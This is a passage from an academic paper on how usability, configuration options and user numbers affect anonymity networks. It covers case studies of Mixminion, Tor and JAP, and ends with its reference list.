designing their application. Of course, when end users do know more about their individual security requirements than application designers, then adding options is beneficial, espe- cially when users describe their own situation (home or enterprise; shared versus single-user host) rather than trying to specify what the program should do about their situation. In privacy applications, superfluous options are even worse. When there are many different possible configurations, eavesdroppers and insiders can often tell users apart by which settings they choose. For example, the Type I or “Cypher- punk” anonymous email network uses the OpenPGP encrypted message format, which supports many symmetric and asymmetric ciphers. Because different users prefer different ciphers, and because different versions of encryption programs implementing OpenPGP (such as PGP and GnuPG) use different cipher suites, users with uncommon preferences and versions stand out from the rest, and get little privacy at all. Similarly, Type I allows users to pad their messages to a fixed size so that an eavesdropper can’t correlate the sizes of messages passing through the network—but it forces the user to decide what size of padding to use! Unless a user can guess which padding size will happen to be most popular, the option provides attackers with another way to tell users apart. Even when users’ needs genuinely vary, adding options does not necessarily serve their privacy. In practice, the default option usually prevails for casual users, and therefore needs to prevail for security-conscious users even when it would not otherwise be their best choice. For example, when an anonymizing network allows user-selected message latency (like the Type I network does), most users tend to use whichever setting is the default, so long as it works. Of the fraction of users who change the default at all, most will not, in fact, understand the security implications; and those few who do will need to decide whether the increased traffic-analysis resistance that comes with more variable latency is worth the decreased anonymity that comes from splitting away from the bulk of the user base. 5 Case study: Mixminion and MIME We’ve argued that providing too many observable options can hurt privacy, but we’ve also argued that focusing too hard on privacy over usability can hurt privacy itself. What happens when these principles conflict? We encountered such a situation when designing how the Mixminion anony- mous email network [6] should handle MIME-encoded data. MIME (Multipur- pose Internet Mail Extensions) is the way a mail client tells the receiving mail client about attachments, which character set was used, and so on. As a stan- dard, MIME is so permissive and flexible that different email programs are al- most always distinguishable by which subsets of the format, and which types of encodings, they choose to generate. Trying to “normalize” MIME by convert- ing all mail to a standard only works up to a point: it’s trivial to convert all encodings to quoted-printable, for example, or to impose a standard order for multipart/alternative parts; but demanding a uniform list of formats for multi- part/alternative messages, normalizing HTML, stripping identifying information from Microsoft Office documents, or imposing a single character encoding on each language would likely be an impossible task. Other possible solutions to this problem could include limiting users to a single email client, or simply banning email formats other than plain 7-bit ASCII. But these procrustean approaches would limit usability, and turn users away from the Mixminion network. Since fewer users mean less anonymity, we must ask whether users would be better off in a larger network where their messages are likelier to be distinguishable based on email client, or in a smaller network where everyone’s email formats look the same. Some distinguishability is inevitable anyway, since users differ in their inter- ests, languages, and writing styles: if Alice writes about astronomy in Amharic, her messages are unlikely to be mistaken for Bob’s, who writes about botany in Basque. Also, any attempt to restrict formats is likely to backfire. If we limited Mixminion to 7-bit ASCII, users wouldn’t stop sending each other images, PDF files, and messages in Chinese: they would instead follow the same evolutionary path that led to MIME in the first place, and encode their messages in a variety of distinguishable formats, with each client software implementation having its own ad hoc favorites. So imposing uniformity in this place would not only drive away users, but would probably fail in the long run, and lead to fragmentation at least as dangerous as we were trying to avoid. We also had to consider threat models. To take advantage of format dis- tinguishability, an attacker needs to observe messages leaving the network, and either exploit prior knowledge of suspected senders (“Alice is the only user who owns a 1995 copy of Eudora”), or feed message format information into traffic analysis approaches (“Since half of the messages to Alice are written in English, I’ll assume they mostly come from different senders than the ones in Amharic.”). Neither attack is certain or easy for all attackers; even if we can’t defeat them in the worst possible case (where the attacker knows, for example, that only one copy of LeetMailPro was ever sold), we can provide vulnerable users with protection against weaker attackers. In the end, we compromised: we perform as much normalization as we can, and warn the user about document types such as MS Word that are likely to re- veal identifying information, but we do not forbid any particular format or client software. This way, users are informed about how to blend with the largest pos- sible anonymity set, but users who prefer to use distinguishable formats rather than nothing at all still receive and contribute protection against certain attack- ers. 6 Case study: Tor Installation Usability and marketing have also proved important in the development of Tor, a low-latency anonymizing network for TCP traffic. The technical challenges Tor has solved, and the ones it still needs to address, are described in its design paper [8], but at this point many of the most crucial challenges are in adoption and usability. While Tor was in it earliest stages, its user base was a small number of fairly sophisticated privacy enthusiasts with experience running Unix services, who wanted to experiment with the network (or so they say; by design, we don’t track our users). As the project gained more attention from venues including security conferences, articles on Slashdot.org and Wired News, and more mainstream media like the New York Times, Forbes, and the Wall Street Journal, we added more users with less technical expertise. These users can now provide a broader base of anonymity for high-needs users, but only when they receive good support themselves. For example, it has proven difficult to educate less sophisticated users about DNS issues. Anonymizing TCP streams (as Tor does) does no good if appli- cations reveal where they are about to connect by first performing a non- anonymized hostname lookup. To stay anonymous, users need either to configure their applications to pass hostnames to Tor directly by using SOCKS4a or the hostname-based variant of SOCKS5; to manually resolve hostnames with Tor and pass the resulting IPs to their applications; or to direct their applications to application-specific proxies which handle each protocol’s needs independently. None of these is easy for an unsophisticated user, and when they misconfigure their systems, they not only compromise their own privacy, but also provide no cover for the users who are configured correctly: if Bob leaks a DNS request whenever he is about to connect to a website, an observer can tell that anybody connecting to Alice’s website anonymously must not be Bob. Thus, experienced users have an interest in making sure inexperienced users can use the system correctly. Tor being hard to configure is a weakness for everybody. We’ve tried a few solutions that didn’t work as well as we hoped. Improving documentation only helped the users who read it. We changed Tor to warn users who provided an IP address rather than a hostname, but this warning usually resulted in several email exchanges to explain DNS to the casual user, who had typically no idea how to solve his problem. At the time of this writing, the most important solutions for these users have been to improve Tor’s documentation for how to configure various applications to use Tor; to change the warning messages to refer users to a description of the solution (“You are insecure. See this webpage.”) instead of a description of the problem (“Your application is sending IPs instead of hostnames, which may leak information. Consider using SOCKS4a instead.”); and to bundle Tor with the support tools that it needs, rather than relying on users to find and configure them on their own. 7 Case study: JAP and its anonym-o-meter The Java Anon Proxy (JAP) is a low-latency anonymizing network for web browsing developed and deployed by the Technical University of Dresden in Germany [3]. Unlike Tor, which uses a free-route topology where each user can choose where to enter the network and where to exit, JAP has fixed-route cas- cades that aggregate user traffic into a single entry point and a single exit point. The JAP client includes a GUI: Notice the ‘anonymity meter’ giving the user an impression of the level of protection for his current traffic. How do we decide the value that the anonym-o-meter should report? In JAP’s case, it’s based on the number of other users traveling through the cascade at the same time. But alas, since JAP aims for quick transmission of bytes from one end of the cascade to the other, it falls prey to the same end-to-end timing correlation attacks as we described above. That is, an attacker who can watch both ends of the cascade won’t actually be distracted by the other users [5, 10]. The JAP team has plans to implement full-scale padding from every user (sending and receiving packets all the time even when they have nothing to send), but—for usability reasons—they haven’t gone forward with these plans. As the system is now, anonymity sets don’t provide a real measure of security for JAP, since any attacker who can watch both ends of the cascade wins, and the number of users on the network is no real obstacle to this attack. However, we think the anonym-o-meter is a great way to present security information to the user, and we hope to see a variant of it deployed one day for a high-latency system like Mixminion, where the amount of current traffic in the system is more directly related to the protection it offers. 8 Bootstrapping, confidence, and reputability Another area where human factors are critical in privacy is in bootstrapping new systems. Since new systems start out with few users, they initially provide only small anonymity sets. This starting state creates a dilemma: a new system with improved privacy properties will only attract users once they believe it is popular and therefore has high anonymity sets; but a system cannot be popular without attracting users. New systems need users for privacy, but need privacy for users. Low-needs users can break the deadlock [1]. The earliest stages of an anonymiz- ing network’s lifetime tend to involve users who need only to resist weak attack- ers who can’t know which users are using the network and thus can’t learn the contents of the small anonymity set. This solution reverses the early adopter trends of many security systems: rather than attracting first the most security- conscious users, privacy applications must begin by attracting low-needs users and hobbyists. But this analysis relies on users’ accurate perceptions of present and future anonymity set size. As in market economics, expectations themselves can bring about trends: a privacy system which people believe to be secure and popular will gain users, thus becoming (all things equal) more secure and popular. Thus, security depends not only on usability, but also on perceived usability by others, and hence on the quality of the provider’s marketing and public relations. Per- versely, over-hyped systems (if they are not too broken) may be a better choice than modestly promoted ones, if the hype attracts more users. Yet another factor in the safety of a given network is its reputability: the perception of its social value based on its current users. If I’m the only user of a system, it might be socially accepted, but I’m not getting any anonymity. Add a thousand Communists, and I’m anonymous, but everyone thinks I’m a Commie. Add a thousand random citizens (cancer survivors, privacy enthusiasts, and so on) and now I’m hard to profile. The more cancer survivors on Tor, the better for the human rights activists. The more script kiddies, the worse for the normal users. Thus, reputability is an anonymity issue for two reasons. First, it impacts the sustainability of the network: a network that’s always about to be shut down has difficulty attracting and keeping users, so its anonymity set suffers. Second, a disreputable network attracts the attention of powerful attackers who may not mind revealing the identities of all the users to uncover the few bad ones. While people therefore have an incentive for the network to be used for “more reputable” activities than their own, there are still tradeoffs involved when it comes to anonymity. To follow the above example, a network used entirely by cancer survivors might welcome some Communists onto the network, though of course they’d prefer a wider variety of users. The impact of public perception on security is especially important during the bootstrapping phase of the network, where the first few widely publicized uses of the network can dictate the types of users it attracts next. 9 Technical challenges to guessing the number of users in a network In addition to the social problems we describe above that make it difficult for a typical user to guess which anonymizing network will be most popular, there are some technical challenges as well. These stem from the fact that anonymizing networks are good at hiding what’s going on—even from their users. For example, one of the toughest attacks to solve is that an attacker might sign up many users to artificially inflate the apparent size of the network. Not only does this Sybil attack increase the odds that the attacker will be able to successfully compromise a given user transaction [9], but it might also trick users into thinking a given network is safer than it actually is. And finally, as we saw when discussing JAP above, the feasibility of end-to- end attacks makes it hard to guess how much a given other user is contributing to your anonymity. Even if he’s not actively trying to trick you, he can still fail to provide cover for you, either because his behavior is sufficiently different from yours (he’s active during the day, and you’re active at night), because his transactions are different (he talks about physics, you talk about AIDS), or because network design parameters (such as low delay for messages) mean the attacker is able to track transactions more easily. 10 Bringing it all together Users’ safety relies on them behaving like other users. But how can they predict other users’ behavior? If they need to behave in a way that’s different from the rest of the users, how do they compute the tradeoff and risks? There are several lessons we might take away from researching anonymity and usability. On the one hand, we might remark that anonymity is already tricky from a technical standpoint, and if we’re required to get usability right as well before anybody can be safe, it will be hard indeed to come up with a good design: if lack of anonymity means lack of users, then we’re stuck in a depressing loop. On the other hand, the loop has an optimistic side too. Good anonymity can mean more users: if we can make good headway on usability, then as long as the technical designs are adequate, we’ll end up with enough users to make everything work out. In any case, declining to design a good solution means leaving most users to a less secure network or no anonymizing network at all. Cancer survivors and abuse victims would continue communications and research over the Internet, risking social or employment problems; and human rights workers in oppressive countries would continue publishing their stories. The temptation to focus on designing a perfectly usable system before build- ing it can be self-defeating, since obstacles to usability are often unforeseen. We believe that the security community needs to focus on continuing experimental deployment. References 1. Alessandro Acquisti, Roger Dingledine, and Paul Syverson. On the Economics of Anonymity. In Rebecca N. Wright, editor, Financial Cryptography. Springer- Verlag, LNCS 2742, January 2003. 2. Adam Back, Ulf M¨oller, and Anton Stiglic. Traffic Analysis Attacks and Trade-Offs in Anonymity Providing Systems. In Ira S. Moskowitz, editor, Information Hiding (IH 2001), pages 245–257. Springer-Verlag, LNCS 2137, 2001. 3. Oliver Berthold, Hannes Federrath, and Stefan K¨opsell. Web MIXes: A system for anonymous and unobservable Internet access. In H. Federrath, editor, Designing Privacy Enhancing Technologies: Workshop on Design Issue in Anonymity and Unobservability. Springer-Verlag, LNCS 2009, July 2000. 4. Lorrie Cranor and Mary Ellen Zurko, editors. Proceedings of the Symposium on Usability Privacy and Security (SOUPS 2005), Pittsburgh, PA, July 2005. 5. George Danezis. The traffic analysis of continuous-time mixes. In David Martin and Andrei Serjantov, editors, Privacy Enhancing Technologies (PET 2004), LNCS, May 2004. http://www.cl.cam.ac.uk/users/gd216/cmm2.pdf. 6. George Danezis, Roger Dingledine, and Nick Mathewson. Mixminion: Design of a type III anonymous remailer protocol. In 2003 IEEE Symposium on Security and Privacy, pages 2–15. IEEE CS, May 2003. 7. Claudia Diaz, Stefaan Seys, Joris Claessens, and Bart Preneel. Towards measuring anonymity. In Paul Syverson and Roger Dingledine, editors, Privacy Enhancing Technologies, LNCS, April 2002. 8. Roger Dingledine, Nick Mathewson, and Paul Syverson. Tor: The Second- Generation Onion Router. In Proceedings of the 13th USENIX Security Symposium, August 2004. 9. John Douceur. The Sybil Attack. In Proceedings of the 1st International Peer To Peer Systems Workshop (IPTPS), March 2002. 10. Brian N. Levine, Michael K. Reiter, Chenxi Wang, and Matthew K. Wright. Timing attacks in low-latency mix-based systems. In Ari Juels, editor, Proceedings of Financial Cryptography (FC ’04). Springer-Verlag, LNCS 3110, February 2004. 11. Nick Mathewson and Roger Dingledine. Practical Traffic Analysis: Extending and Resisting Statistical Disclosure. In Proceedings of Privacy Enhancing Technologies workshop (PET 2004), volume 3424 of LNCS, May 2004. 12. Ulf M¨oller, Lance Cottrell, Peter Palfrader, and Len Sassaman. Mixmaster Protocol — Version 2. Draft, July 2003. http://www.abditum.com/mixmaster-spec.txt. 13. Michael Reiter and Aviel Rubin. Crowds: Anonymity for web transactions. ACM Transactions on Information and System Security, 1(1), June 1998. 14. Andrei Serjantov and George Danezis. Towards an information theoretic metric for anonymity. In Paul Syverson and Roger Dingledine, editors, Privacy Enhancing Technologies, LNCS, San Francisco, CA, April 2002.
pdf